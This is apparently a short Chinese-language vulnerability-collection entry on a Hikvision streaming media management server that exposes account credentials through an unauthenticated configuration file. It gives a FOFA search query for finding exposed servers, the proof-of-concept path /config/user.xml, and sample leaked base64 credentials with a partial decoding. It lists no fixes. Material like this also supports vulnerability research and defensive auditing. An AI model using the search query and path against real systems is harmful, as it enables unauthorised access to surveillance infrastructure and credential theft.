# HIKVISION 流媒体管理服务器 user.xml 账号密码泄漏漏洞

## 漏洞描述

HIKVISION 流媒体管理服务器配置文件未做鉴权，攻击者通过漏洞可以获取网站账号密码

## 漏洞影响

```
HIKVISION 流媒体管理服务器
```

## FOFA

```
"杭州海康威视系统技术有限公司 版权所有" && title="流媒体管理服务器"
```

## 漏洞复现

登陆页面

![image-20220519172629739](./images/202205191726829.png)

POC

```
/config/user.xml
```

![image-20220519172714407](./images/202205191727443.png)

```
<user name="YWRtaW4=" password="MTIzNDU="/>
```

base64解密

```
<user name="admin" password="MTIzNDU="/>
```